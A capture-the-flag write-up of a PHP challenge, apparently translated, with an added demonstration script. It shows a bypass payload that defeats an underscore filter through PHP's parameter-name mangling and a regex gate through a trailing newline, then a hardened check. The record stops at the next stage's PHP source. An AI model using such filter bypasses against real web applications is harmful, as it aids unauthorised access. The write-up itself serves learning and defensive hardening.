Code audit: an underscore in a parameter name can be replaced by a space or a dot.
<!--
//1st
$query = $_SERVER['QUERY_STRING'];
if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){
die('Y0u are So cutE!');
}
if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){
echo "you are going to the next ~";
}
-->
The first check requires that the query string contain no underscore; it can be bypassed with %20. Why?
The second check requires the value to match 23333 while not comparing equal to 23333; appending a newline (%0a) bypasses it. I don't understand why.
?b%20u%20p%20t=23333%0a does the job.
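The two behaviours behind that payload, shown as an added example (this is not the challenge's own code). It rests on two PHP facts: when PHP builds $_GET it rewrites dots and spaces in parameter names to underscores, so the raw QUERY_STRING can be free of "_" and "%5f" while $_GET still contains the key b_u_p_t (parse_str() applies the same mangling, which lets the example run without a web server); and in PCRE the "$" anchor matches before a final "\n" unless the D modifier is set, so "23333\n" satisfies /^23333$/ while still being !== '23333'. The hardened check uses \z (absolute end of subject) instead; the function names and inputs are constructed for the demonstration.

```php
<?php
// Added example, not the challenge's code: why the two gates on the page
// are bypassable and what a hardened version of the second one looks like.

// PHP rewrites '.' and ' ' in query-parameter names to '_' when filling
// $_GET; parse_str() follows the same rule, so it can stand in for $_GET here.
function mangledKeys(string $queryString): array
{
    parse_str($queryString, $params);
    return array_keys($params);
}

// The page's underscore filter, unchanged: it inspects the raw query string,
// not the mangled $_GET keys.
function underscoreFilterRejects(string $queryString): bool
{
    return substr_count($queryString, '_') !== 0 || substr_count($queryString, '%5f') != 0;
}

// The page's second gate. '$' matches before a trailing "\n" in PCRE, so a
// value of "23333\n" passes the regex while failing the identity comparison.
function originalGate(string $value): bool
{
    return $value !== '23333' && preg_match('/^23333$/', $value) === 1;
}

// Hardened gate: \z anchors at the absolute end of the subject (the D
// modifier on the pattern is equivalent), so a trailing newline no longer
// satisfies the regex and the gate cannot be passed with "23333\n".
function hardenedGate(string $value): bool
{
    return $value !== '23333' && preg_match('/^23333\z/', $value) === 1;
}

// Constructed inputs for the demonstration.
$rawQuery = 'b%20u%20p%20t=23333%0a';

var_dump(underscoreFilterRejects($rawQuery)); // the raw string has no '_' or '%5f'
var_dump(mangledKeys($rawQuery));             // yet the parsed key is b_u_p_t
var_dump(mangledKeys('b.u.p.t=1'));           // dots are mangled the same way

$value = "23333\n";
var_dump(originalGate($value));               // trailing newline slips past '$'
var_dump(hardenedGate($value));               // \z closes that gap
```

Run it with the PHP CLI (php example.php). The underscore filter reports no match on the raw query while parse_str() yields the key b_u_p_t; originalGate() returns true for "23333\n" and hardenedGate() returns false for it. The defensive takeaways are to validate the decoded parameter values rather than the raw QUERY_STRING, and to anchor end-of-input checks with \z or the D modifier whenever a regex is used as a gate.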
The next hint is:
how smart you are ~
FLAG is in secrettw.php
Looking at the source of that page, the JSFuck decodes to "post me Merak"; sending a POST with Merak=1 then returns:
Flag is here~But how to get it?
<?php
error_reporting(0);
include 'takeip.php';
ini_set('open_basedir','.');
include 'flag.php'